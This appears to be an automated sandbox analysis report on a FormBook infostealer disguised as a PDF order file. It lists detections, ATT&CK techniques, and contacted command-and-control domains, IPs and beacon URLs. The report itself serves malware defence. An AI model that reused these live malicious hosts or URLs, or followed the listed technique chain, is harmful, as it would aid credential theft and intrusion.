Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_00A06735 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

8_2_00A06735

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	512 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	512 Process Injection	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	14 Obfuscated Files or Information	DCSync	213 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Rundll32	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Timestomp	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 DLL Side-Loading	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ORDER_1105-19-24-3537.pdf.exe	69%	ReversingLabs	Win32.Backdoor.FormBook
ORDER_1105-19-24-3537.pdf.exe	71%	Virustotal		Browse
ORDER_1105-19-24-3537.pdf.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.beauty.university	0%	Virustotal	Browse
nicoleb.tech	11%	Virustotal	Browse
www.hinet.tech	0%	Virustotal	Browse
www.abandoned-houses-39863.bond	0%	Virustotal	Browse
practicalfranchises.info	11%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.run-run.tokyo	0%	Avira URL Cloud	safe
http://www.qwechaotk.top/rn94/www.ln2m1.shop	100%	Avira URL Cloud	phishing
http://www.practicalfranchises.infoReferer:	0%	Avira URL Cloud	safe
http://www.practicalfranchises.info/rn94/	100%	Avira URL Cloud	malware
http://www.day2go.net/rn94/?jDHh=Ls1ijzPDaFH4ewLYvuUNL8D06n2bzs/1tKV87wXNHEYKjENRXhu0pLj1Kv8q6blj9L7T&9r9Hc=ytxTjD5hRxA	0%	Avira URL Cloud	safe
http://www.resdai.xyzReferer:	0%	Avira URL Cloud	safe
http://www.bigbrown999.site/rn94/www.bdkasinoxox.xyz	100%	Avira URL Cloud	malware
https://word.office.comon	0%	Avira URL Cloud	safe
http://www.hinet.techReferer:	0%	Avira URL Cloud	safe
http://www.resdai.xyz	0%	Avira URL Cloud	safe
https://powerpoint.office.comcember	0%	Avira URL Cloud	safe
http://www.yzh478c.xyz/rn94/	100%	Avira URL Cloud	malware
http://www.abandoned-houses-39863.bondReferer:	0%	Avira URL Cloud	safe
https://excel.office.com	0%	Avira URL Cloud	safe
http://www.bigbrown999.site/rn94/	100%	Avira URL Cloud	malware
http://www.beauty.university	0%	Avira URL Cloud	safe
http://www.longmaosol.xyz	100%	Avira URL Cloud	malware
http://schemas.micro	0%	Avira URL Cloud	safe
http://www.abandoned-houses-39863.bond/rn94/	0%	Avira URL Cloud	safe
http://www.bdkasinoxox.xyzReferer:	0%	Avira URL Cloud	safe
http://www.laske.xyz/rn94/www.run-run.tokyo	100%	Avira URL Cloud	malware
http://www.laske.xyzReferer:	0%	Avira URL Cloud	safe
http://www.practicalfranchises.info/rn94/www.yzh478c.xyz	100%	Avira URL Cloud	malware
http://www.beauty.universityReferer:	0%	Avira URL Cloud	safe
http://www.qwechaotk.top	100%	Avira URL Cloud	phishing
http://www.hinet.tech/rn94/www.beauty.university	0%	Avira URL Cloud	safe
http://www.beauty.university/rn94/	0%	Avira URL Cloud	safe
http://www.qwechaotk.top/rn94/?jDHh=Fx60rCVvY/PfTPS+x0Yy+mO10iBB7HzlvlxbYnAbTZ/GodXDJ0QLvzTZw6Pc1HX1Gik3&9r9Hc=ytxTjD5hRxA	100%	Avira URL Cloud	phishing
http://www.bdkasinoxox.xyz/rn94/?9r9Hc=ytxTjD5hRxA&jDHh=I5NiMU91ItirT7qNKaN02XXkh1pCEM2b67jBRcxD66PzibDnIUK5R57IVHBUjGxrStSp	100%	Avira URL Cloud	malware
http://www.bdkasinoxox.xyz	0%	Avira URL Cloud	safe
http://www.nicoleb.tech	0%	Avira URL Cloud	safe
http://www.010101-11122-2222.cloud/rn94/www.longmaosol.xyz	100%	Avira URL Cloud	phishing
http://www.bigbrown999.site	0%	Avira URL Cloud	safe
http://www.ln2m1.shop/rn94/www.practicalfranchises.info	100%	Avira URL Cloud	malware
http://www.ln2m1.shop/rn94/	100%	Avira URL Cloud	malware
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	Avira URL Cloud	safe
http://www.nicoleb.tech/rn94/	0%	Avira URL Cloud	safe
http://www.yzh478c.xyzReferer:	0%	Avira URL Cloud	safe
http://www.hinet.tech/rn94/	0%	Avira URL Cloud	safe
http://www.beauty.university/rn94/www.nicoleb.tech	0%	Avira URL Cloud	safe
http://www.010101-11122-2222.cloudReferer:	0%	Avira URL Cloud	safe
http://www.ln2m1.shopReferer:	0%	Avira URL Cloud	safe
https://wns.windows.com/)s	0%	Avira URL Cloud	safe
http://www.nicoleb.tech/rn94/www.laske.xyz	0%	Avira URL Cloud	safe
http://www.day2go.net	0%	Avira URL Cloud	safe
http://www.010101-11122-2222.cloud	100%	Avira URL Cloud	phishing
http://www.qwechaotk.topReferer:	0%	Avira URL Cloud	safe
http://www.run-run.tokyo/rn94/www.010101-11122-2222.cloud	100%	Avira URL Cloud	malware
www.laske.xyz/rn94/	100%	Avira URL Cloud	malware
http://www.laske.xyz/rn94/	100%	Avira URL Cloud	malware
http://www.run-run.tokyo/rn94/	100%	Avira URL Cloud	malware
http://www.run-run.tokyoReferer:	0%	Avira URL Cloud	safe
http://www.abandoned-houses-39863.bond/rn94/www.bigbrown999.site	0%	Avira URL Cloud	safe
http://www.day2go.netReferer:	0%	Avira URL Cloud	safe
http://www.day2go.net/rn94/www.resdai.xyz	0%	Avira URL Cloud	safe
http://www.nicoleb.techReferer:	0%	Avira URL Cloud	safe
http://www.yzh478c.xyz/rn94/www.hinet.tech	100%	Avira URL Cloud	malware
http://www.longmaosol.xyzReferer:	0%	Avira URL Cloud	safe
http://www.abandoned-houses-39863.bond	0%	Avira URL Cloud	safe
https://outlook.com	0%	Avira URL Cloud	safe
http://www.resdai.xyz/rn94/	0%	Avira URL Cloud	safe
http://www.ln2m1.shop	0%	Avira URL Cloud	safe
http://www.qwechaotk.top/rn94/	100%	Avira URL Cloud	phishing
http://www.day2go.net/rn94/	0%	Avira URL Cloud	safe
http://www.resdai.xyz/rn94/www.qwechaotk.top	0%	Avira URL Cloud	safe
https://android.notify.windows.com/iOS	0%	Avira URL Cloud	safe
http://www.010101-11122-2222.cloud/rn94/	100%	Avira URL Cloud	phishing
http://www.practicalfranchises.info	0%	Avira URL Cloud	safe
http://www.yzh478c.xyz	0%	Avira URL Cloud	safe
http://www.bdkasinoxox.xyz/rn94/www.day2go.net	100%	Avira URL Cloud	malware
http://www.bigbrown999.siteReferer:	0%	Avira URL Cloud	safe
http://www.laske.xyz	0%	Avira URL Cloud	safe
https://api.msn.com/	0%	Avira URL Cloud	safe
http://www.bdkasinoxox.xyz/rn94/	100%	Avira URL Cloud	malware
http://www.hinet.tech	0%	Avira URL Cloud	safe
http://crl.v	0%	Avira URL Cloud	safe
http://www.longmaosol.xyz/rn94/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.beauty.university	35.214.167.24	true	true	0%, Virustotal, Browse	unknown
nicoleb.tech	50.87.178.238	true	true	11%, Virustotal, Browse	unknown
www.hinet.tech	13.248.252.114	true	true	0%, Virustotal, Browse	unknown
www.abandoned-houses-39863.bond	185.53.179.90	true	true	0%, Virustotal, Browse	unknown
practicalfranchises.info	3.33.130.190	true	true	11%, Virustotal, Browse	unknown
shops.myshopify.com	23.227.38.74	true	true		unknown
www.qwechaotk.top	154.21.81.142	true	true		unknown
bdkasinoxox.xyz	162.0.209.7	true	true		unknown
www.day2go.net	unknown	unknown	true		unknown
www.yzh478c.xyz	unknown	unknown	true		unknown
www.bdkasinoxox.xyz	unknown	unknown	true		unknown
www.ln2m1.shop	unknown	unknown	true		unknown
www.nicoleb.tech	unknown	unknown	true		unknown
www.practicalfranchises.info	unknown	unknown	true		unknown
www.bigbrown999.site	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.day2go.net/rn94/?jDHh=Ls1ijzPDaFH4ewLYvuUNL8D06n2bzs/1tKV87wXNHEYKjENRXhu0pLj1Kv8q6blj9L7T&9r9Hc=ytxTjD5hRxA	true	Avira URL Cloud: safe	unknown
http://www.qwechaotk.top/rn94/?jDHh=Fx60rCVvY/PfTPS+x0Yy+mO10iBB7HzlvlxbYnAbTZ/GodXDJ0QLvzTZw6Pc1HX1Gik3&9r9Hc=ytxTjD5hRxA	true	Avira URL Cloud: phishing	unknown
http://www.bdkasinoxox.xyz/rn94/?9r9Hc=ytxTjD5hRxA&jDHh=I5NiMU91ItirT7qNKaN02XXkh1pCEM2b67jBRcxD66PzibDnIUK5R57IVHBUjGxrStSp	true	Avira URL Cloud: malware	unknown
www.laske.xyz/rn94/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 00000006.00000002.4545985269.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.practicalfranchises.info/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.hinet.techReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bigbrown999.site/rn94/www.bdkasinoxox.xyz	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.qwechaotk.top/rn94/www.ln2m1.shop	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.resdai.xyzReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.resdai.xyz	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.practicalfranchises.infoReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.run-run.tokyo	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 00000006.00000002.4549228460.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2118388010.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yzh478c.xyz/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.abandoned-houses-39863.bond/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000006.00000002.4546921012.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876221001.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3095307334.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000006.00000000.2110577244.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4545353791.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4545269942.0000000008870000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
